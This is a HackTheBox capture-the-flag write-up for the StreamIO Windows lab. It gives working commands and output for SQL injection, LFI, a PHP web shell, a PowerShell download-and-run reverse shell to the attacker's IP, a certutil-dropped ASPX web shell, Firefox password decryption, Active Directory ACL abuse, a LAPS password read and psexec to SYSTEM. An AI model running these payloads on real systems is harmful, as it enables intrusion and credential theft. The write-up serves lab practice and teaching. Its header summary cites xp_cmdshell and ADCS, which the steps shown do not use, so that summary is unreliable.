WriteupsHTB — StreamIO
ADMediumWindows
HTB — StreamIO
SQLi on login page, LFI reveals PHP source. MSSQL xp_cmdshell for shell. Firefox DPAPI credential decryption leads to Domain Admin via ADCS.
January 31, 2025HackTheBox
#AD#SQLi#LFI#ADCS
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.158
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-31 20:43 EST
Stats: 0:02:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 84.21% done; ETC: 20:46 (0:00:10 remaining)
Nmap scan report for 10.10.11.158
Host is up (0.021s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-01 08:45:29Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-02-01T08:47:04+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-01T08:46:25
|_ start_date: N/A
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 19.63 ms 10.10.14.1
2 19.73 ms 10.10.11.158
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.14 seconds80
sh
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server445
sh
smbclient -N -L \\\\10.10.11.158
session setup failed: NT_STATUS_ACCESS_DENIED
smbclient -L \\\\10.10.11.158 -U 'Guest'
Password for [WORKGROUP\Guest]:
session setup failed: NT_STATUS_ACCOUNT_DISABLEDdir search
watch.steamio.htb
sh
feroxbuster -u https://watch.streamio.htb -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://watch.streamio.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 72l 112w 875c https://watch.streamio.htb/static/css/index.css
200 GET 192l 1006w 82931c https://watch.streamio.htb/static/icon.png
200 GET 136l 295w 22042c https://watch.streamio.htb/static/logo.png
200 GET 78l 245w 2829c https://watch.streamio.htb/
301 GET 2l 10w 157c https://watch.streamio.htb/static => https://watch.streamio.htb/static/
301 GET 2l 10w 161c https://watch.streamio.htb/static/css => https://watch.streamio.htb/static/css/
301 GET 2l 10w 160c https://watch.streamio.htb/static/js => https://watch.streamio.htb/static/js/
403 GET 29l 92w 1233c https://watch.streamio.htb/static/
403 GET 29l 92w 1233c https://watch.streamio.htb/static/css/
301 GET 2l 10w 161c https://watch.streamio.htb/static/CSS => https://watch.streamio.htb/static/CSS/
301 GET 2l 10w 160c https://watch.streamio.htb/static/JS => https://watch.streamio.htb/static/JS/
301 GET 2l 10w 160c https://watch.streamio.htb/static/Js => https://watch.streamio.htb/static/Js/
301 GET 2l 10w 161c https://watch.streamio.htb/static/Css => https://watch.streamio.htb/static/Css/
[#>------------------] - 35s 19962/240031 6m found:13 errors:0
🚨 Caught ctrl+c 🚨 saving scan state to ferox-https_watch_streamio_htb-1738375083.state ...
[#>------------------] - 35s 19976/240031 6m found:13 errors:0
[##>-----------------] - 35s 3102/30000 88/s https://watch.streamio.htb/
[#>------------------] - 35s 2921/30000 84/s https://watch.streamio.htb/static/
[#>------------------] - 35s 2901/30000 83/s https://watch.streamio.htb/static/css/
[#>------------------] - 34s 2799/30000 83/s https://watch.streamio.htb/static/js/
[#>------------------] - 30s 2449/30000 81/s https://watch.streamio.htb/static/CSS/
[#>------------------] - 25s 2099/30000 85/s https://watch.streamio.htb/static/JS/
[#>------------------] - 23s 1819/30000 79/s https://watch.streamio.htb/static/Js/
[#>------------------] - 22s 1799/30000 81/s https://watch.streamio.htb/static/Css/streamio.htb
sh
feroxbuster -u https://streamio.htb/ -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://streamio.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 151c https://streamio.htb/images => https://streamio.htb/images/
301 GET 2l 10w 147c https://streamio.htb/js => https://streamio.htb/js/
301 GET 2l 10w 148c https://streamio.htb/css => https://streamio.htb/css/
301 GET 2l 10w 150c https://streamio.htb/admin => https://streamio.htb/admin/
200 GET 192l 1006w 82931c https://streamio.htb/images/icon.png
200 GET 51l 213w 19329c https://streamio.htb/images/client.jpg
200 GET 101l 173w 1663c https://streamio.htb/css/responsive.css
200 GET 5l 374w 21257c https://streamio.htb/js/popper.min.js
200 GET 863l 1698w 16966c https://streamio.htb/css/style.css
200 GET 913l 5479w 420833c https://streamio.htb/images/about-img.png
200 GET 206l 430w 6434c https://streamio.htb/contact.php
200 GET 367l 1995w 166220c https://streamio.htb/images/contact-img.png
200 GET 111l 269w 4145c https://streamio.htb/login.php
200 GET 231l 571w 7825c https://streamio.htb/about.php
200 GET 2l 1276w 88145c https://streamio.htb/js/jquery-3.4.1.min.js
200 GET 395l 915w 13497c https://streamio.htb/index.php
200 GET 395l 915w 13497c https://streamio.htb/streamio.htb/admin
sh
feroxbuster --url https://streamio.htb/admin/ -x php,txt,pdf,asp,aspx,py,js,jsp,yml,yaml,zip,rb,pl,doc,docx,xls,xlsx,conf,sql -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://streamio.htb/admin/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, pdf, asp, aspx, py, js, jsp, yml, yaml, zip, rb, pl, doc, docx, xls, xlsx, conf, sql]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 1l 1w 18c https://streamio.htb/admin/
301 GET 2l 10w 157c https://streamio.htb/admin/images => https://streamio.htb/admin/images/
301 GET 2l 10w 154c https://streamio.htb/admin/css => https://streamio.htb/admin/css/
301 GET 2l 10w 153c https://streamio.htb/admin/js => https://streamio.htb/admin/js/
301 GET 2l 10w 157c https://streamio.htb/admin/Images => https://streamio.htb/admin/Images/
403 GET 1l 1w 18c https://streamio.htb/admin/index.php
301 GET 2l 10w 156c https://streamio.htb/admin/fonts => https://streamio.htb/admin/fonts/
301 GET 2l 10w 154c https://streamio.htb/admin/CSS => https://streamio.htb/admin/CSS/
200 GET 8l 22w 215c https://streamio.htb/admin/js/custom.js
301 GET 2l 10w 153c https://streamio.htb/admin/JS => https://streamio.htb/admin/JS/
301 GET 2l 10w 153c https://streamio.htb/admin/Js => https://streamio.htb/admin/Js/
301 GET 2l 10w 154c https://streamio.htb/admin/Css => https://streamio.htb/admin/Css/
200 GET 2l 6w 58c https://streamio.htb/admin/master.php
200 GET 8l 22w 215c https://streamio.htb/admin/JS/custom.js
SQL injection
sh
q=test' UNION SELECT 1,table_name,3,4,5,6 FROM streamio.INFORMATION_SCHEMA.TABLES-- -determine the column names to extract
sh
q=test' UNION SELECT 1,COLUMN_NAME,3,4,5,6 FROM INFORMATION_SCHEMA.COLUMNS where table_name='users'-- -- extracting the username field
sh
q=test' UNION SELECT 1,username,3,4,5,6 FROM users-- -
users
txt
admin
Alexendra:##123a8j8w5123##
Austin
Barbra
Barry
Baxter
Bruno
Carmon
Clara
Diablo
Garfield
Gloria
James
Juliette
Lauren
Lenord
Lucifer
Michelle
Oliver
Robert
Robin
Sabrina
Samantha
Stan
Thane
Theodore
Victor
Victoria
William
yoshihidehashes
txt
0049ac57...
08344b85...:##123a8j8w5123##
083ffae9...
0cfaaaaf...
1c2b3d82...
22ee2183...
2a4e2cf2...:$monique$1991$
35394484...
3577c47e...:highschoolmusical
38446352...
39615488...
54c88b2d...:$hadoW
665a50ac...:paddpadd
6dcd8774...:$3xybitch
7df45a9e...
8097cedd...
925e5408...
b22abb47...:!5psycho8!
b779ba15...:66boysandgirls..
b83439b1...:!?Love?!123
bf55e15b...
c6600604...
d62be0dc...
dc332fb5...
ec33265e...
ee0b8a09...:physics69i
ef8f3d30...:%$clara
f03b910e...
f87d3c0d...:!!sabrina$
fd78db29...passwords
txt
##123a8j8w5123##
$monique$1991$
highschoolmusical
$hadoW
paddpadd
$3xybitch
!5psycho8!
66boysandgirls..
!?Love?!123
physics69i
%$clara
!!sabrina$txt
admin:0049ac57...
Alexendra:08344b85...:##123a8j8w5123##
Austin:083ffae9...
Barbra:0cfaaaaf...
Barry:1c2b3d82...
Baxter:22ee2183...
Bruno:2a4e2cf2...:$monique$1991$
Carmon:35394484...
Clara:3577c47e...:highschoolmusical
Diablo:38446352...
Garfield:39615488...
Gloria:54c88b2d...:$hadoW
James:665a50ac...:paddpadd
Juliette:6dcd8774...:$3xybitch
Lauren:7df45a9e...
Lenord:8097cedd...
Lucifer:925e5408...
Michelle:b22abb47...:!5psycho8!
Oliver:b779ba15...:66boysandgirls..
Robert:b83439b1...:!?Love?!123
Robin:bf55e15b...
Sabrina:c6600604...
Samantha:d62be0dc...
Stan:dc332fb5...
Thane:ec33265e...
Theodore:ee0b8a09...:physics69i
Victor:ef8f3d30...:%$clara
Victoria:f03b910e...
William:f87d3c0d...:!!sabrina$
yoshihide:fd78db29...creds
yoshihide:66boysandgirls..
/admin
ffuf parameters
sh
ffuf -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u https://streamio.htb/admin/?FUZZ=key -H 'Cookie: PHPSESSID=d67rk5rk42n33ehhjm38b0hknu' -fs 1678
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://streamio.htb/admin/?FUZZ=key
:: Wordlist : FUZZ: /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt
:: Header : Cookie: PHPSESSID=d67rk5rk42n33ehhjm38b0hknu
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1678
________________________________________________
debug [Status: 200, Size: 1712, Words: 90, Lines: 50, Duration: 32ms]
movie [Status: 200, Size: 320235, Words: 15986, Lines: 10791, Duration: 45ms]
staff [Status: 200, Size: 12484, Words: 1784, Lines: 399, Duration: 26ms]
user [Status: 200, Size: 2073, Words: 146, Lines: 63, Duration: 59ms]
:: Progress: [6453/6453] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:12] :: Errors: 0 ::LFI
txt
https://streamio.htb/admin/?debug=/windows/win.ini
read with php filter
sh
GET /admin/?debug=php://filter/read=convert.base64-encode/resource=master.php HTTP/2
sh
echo '<?php system($_GET["cmd"]); ?>' > shell.php sh
python3 -m http.server 80- the reason it is already running in php
shell.php
sh
system('whoami');
rev shell
shell.php
php
system("powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.13:8000/powercat.ps1');powercat -c 10.10.14.13 -p 443 -e cmd"); - serve powercat
sh
python3 -m http.server 8000- trigger execution
sh
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.11.158] 61921
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\streamio.htb\admin>whoami
whoami
streamio\yoshihidesh
cp /usr/share/webshells/aspx/cmdasp.aspx ./cmd
C:\inetpub\wwwroot>certutil.exe -f -urlcache -split http://10.10.14.13:8001/cmdasp.aspx cmdasp.aspxcmd
C:\inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is A381-2B63
Directory of C:\inetpub\wwwroot
02/01/2025 04:51 PM <DIR> .
02/01/2025 04:51 PM <DIR> ..
02/22/2022 02:48 AM <DIR> aspnet_client
02/01/2025 04:51 PM 1,400 cmdasp.aspx
02/22/2022 02:46 AM 703 iisstart.htm
02/22/2022 02:46 AM 99,710 iisstart.png
02/01/2025 07:28 AM 8 test.txt
4 File(s) 101,821 bytes
3 Dir(s) 7,033,192,448 bytes freesearch.php
sh
C:\inetpub\watch.streamio.htb>type search.php
type search.php
<?php
$search = strtolower($_POST['q']);
// sqlmap choker
$shitwords = ["/WAITFOR/i", "/vkBQ/i", "/CHARINDEX/i", "/ALL/i", "/SQUARE/i", "/ORDER/i", "/IF/i","/DELAY/i", "/NULL/i", "/UNICODE/i","/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "ifnull/i", "/ or /i"];
foreach ($shitwords as $shitword) {
if (preg_match( $shitword, $search )) {
header("Location: https://watch.streamio.htb/blocked.php");
die("blocked");
}
}
# Query section
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
$handle = sqlsrv_connect('(local)',$connection);
if (!isset($_POST['q']))
{
creds
db_user:B1@hB1@hB1@h
index.php
sh
C:\inetpub\streamio.htb\admin>type index.php
type index.php
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
header('HTTP/1.1 403 Forbidden');
die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);creds
db_admin:B1@hx31234567890
local port forwarding to 1433 MSSQL
sh
C:\inetpub>certutil.exe -f -urlcache -split http://10.10.14.13:8001/chisel.exe chisel.exesh
./chisel server --reverse --port 1234cmd
C:\inetpub>.\chisel.exe client 10.10.14.13:1234 R:1433:127.0.0.1:1433sh
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 652
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 3452sh
mssqlclient.py db_admin@127.0.0.1
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to 'master'.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commandssh
SQL (db_admin db_admin@master)> SELECT name FROM master.dbo.sysdatabases
name
---------------
master
tempdb
model
msdb
STREAMIO
streamio_backup sh
SQL (db_admin db_admin@master)> USE streamio_backupsh
SQL (db_admin db_admin@master)> SELECT table_name FROM streamio_backup.INFORMATION_SCHEMA.TABLES
table_name
----------
movies
userssh
SQL (db_admin db_admin@streamio_backup)> select * from users;
id username password
-- -------------------------------------------------- --------------------------------------------------
1 nikk37 389d14cb...
2 yoshihide b779ba15...
3 James c6600604...
4 Theodore 925e5408...
5 Samantha 083ffae9...
6 Lauren 08344b85...
7 William d62be0dc...
8 Sabrina f87d3c0d... hashcat
sh
hashcat -m 0 '389d14cb...' /usr/share/wordlists/rockyou.txt
389d14cb...:get_dem_girls2@yahoo.com creds
nikk37:get_dem_girls2@yahoo.com
sh
nxc smb 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com sh
nxc winrm 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'
WINRM 10.10.11.158 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:streamIO.htb)
WINRM 10.10.11.158 5985 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com (Pwn3d!)winrm
sh
evil-winrm -i 10.10.11.158 -u 'nikk37' -p 'get_dem_girls2@yahoo.com'
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37sh
*Evil-WinRM* PS C:\Users\nikk37\Desktop> cat user.txt
5823c6ed...bloodhound
sh
sudo bloodhound-python -u 'nikk37' -p 'get_dem_girls2@yahoo.com' -ns 10.10.11.158 -d streamio.htb -c all
zip -r streamio.zip *.jsonwinpeas
sh
*Evil-WinRM* PS C:\Users\nikk37> upload /opt/windows/winPEASx64.exefirefox password
sh
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for Firefox DBs
È https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history
Firefox credentials file exists at C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db
È Run SharpWeb (https://github.com/djhohnstein/SharpWeb)sh
*Evil-WinRM* PS C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles> download br53rxeg.default-release- copy
firepwd.pyinto wherelogins.jsonis
sh
cp /opt/linux/firepwd/firepwd.py ./sh
python3 firepwd.py
...
...
...
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'sh
nxc smb 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com' --users
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\nikk37:get_dem_girls2@yahoo.com
SMB 10.10.11.158 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.158 445 DC Administrator 2025-02-02 01:21:50 33 Built-in account for administering the computer/domain
SMB 10.10.11.158 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.158 445 DC krbtgt 2022-02-22 09:45:13 0 Key Distribution Center Service Account
SMB 10.10.11.158 445 DC JDgodd 2022-02-22 09:56:42 3
SMB 10.10.11.158 445 DC Martin 2022-05-26 23:16:42 0
SMB 10.10.11.158 445 DC nikk37 2022-02-22 09:57:16 0
SMB 10.10.11.158 445 DC yoshihide 2022-02-22 09:57:24 0
SMB 10.10.11.158 445 DC [*] Enumerated 7 local users: streamIOtxt
Administrator
JDgodd
Martin
nikk37
yoshihidesh
nxc smb 10.10.11.158 -u users.txt -p passwords.txt --continue-on-success
SMB 10.10.11.158 445 DC [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r creds
JDgodd:JDg0dd1s@d0p3cr3@t0r
WriteOwner (Core Staff group)
sh
*Evil-WinRM* PS C:\Users\nikk37> upload /opt/windows/PowerView.ps1sh
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('STREAMIO\JDgodd', $SecPassword)sh
Set-DomainObjectOwner -Credential $Cred -Identity "Core Staff" -OwnerIdentity JDgoddsh
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -Rights WriteMemberssh
owneredit.py -action write -new-owner 'JDgodd' -target 'Core Staff' STREAMIO/JDgodd:JDg0dd1s@d0p3cr3@t0r -dc-ip 10.10.11.158
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1470860369-1569627196-4264678630-1104
[*] - sAMAccountName: JDgodd
[*] - distinguishedName: CN=JDgodd,CN=Users,DC=streamIO,DC=htb
[*] OwnerSid modified successfully!sh
ldapdomaindump -u 'STREAMIO\JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -d STREAMIO.HTB -dc-ip 10.10.11.158sh
grep -i 'Core Staff' domain_groups.json
"CORE STAFF"
"CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb"
"CORE STAFF"
"CORE STAFF"
"dn": "CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb"sh
dacledit.py -action write -rights WriteMembers -principal 'JDgodd' -target-dn 'CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb' STREAMIO/JDgodd:JDg0dd1s@d0p3cr3@t0r -dc-ip 10.10.11.158
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250201-232747.bak
[*] DACL modified successfully!sh
net rpc group addmem "Core Staff" "JDgodd" -U "streamio.htb"/"JDgodd"%"JDg0dd1s@d0p3cr3@t0r" -S "10.10.11.158"- vertify
JDgoddwas added to the group ofCore Staff
sh
net rpc group members "Core Staff" -U "streamio.htb"/"JDgodd"%"JDg0dd1s@d0p3cr3@t0r" -S "10.10.11.158"
streamIO\JDgoddReadLAPSPassword
sh
pyLAPS.py --action get -d "STREAMIO" -u "JDgodd" -p "JDg0dd1s@d0p3cr3@t0r"sh
python3 pyLAPS.py --action get -d "STREAMIO" -u "JDgodd" -p "JDg0dd1s@d0p3cr3@t0r" --dc-ip 10.10.11.158
__ ___ ____ _____
____ __ __/ / / | / __ \/ ___/
/ __ \/ / / / / / /| | / /_/ /\__ \
/ /_/ / /_/ / /___/ ___ |/ ____/___/ /
/ .___/\__, /_____/_/ |_/_/ /____/ v1.2
/_/ /____/ @podalirius_
[+] Extracting LAPS passwords of all computers ...
| DC$ : AQN7xLM84$KH8a
[+] All donecreds
administrator:AQN7xLM84$KH8a
sh
nxc smb 10.10.11.158 -u 'administrator' -p 'AQN7xLM84$KH8a'
SMB 10.10.11.158 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.158 445 DC [+] streamIO.htb\administrator:AQN7xLM84$KH8a (Pwn3d!)sh
impacket-psexec streamio/Administrator:'AQN7xLM84$KH8a'@10.10.11.158
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.11.158.....
[*] Found writable share ADMIN$
[*] Uploading file HRVHtNMW.exe
[*] Opening SVCManager on 10.10.11.158.....
[*] Creating service Xgba on 10.10.11.158.....
[*] Starting service Xgba.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemroot.txt
sh
C:\Users\Martin\Desktop> type root.txt
d548755e...Up next
MediumFeb 2025
HTB — Cat
Apache mod_rewrite CVE-2024-38472 XSS in redirect. Stored XSS steals admin cookie for Gitea access. SQLite injection and Gitea hook RCE for root.
Read writeup
EasyFeb 2025
VHL — Techblog
WordPress 4.7.2 on CentOS. Exploited outdated plugin for remote code execution and escalated via sudo misconfiguration.
Read writeup
EasyFeb 2025
VHL — Backupadmin
FTP server with anonymous access exposes backup credentials. Password reuse leads to SSH login and privilege escalation.
Read writeup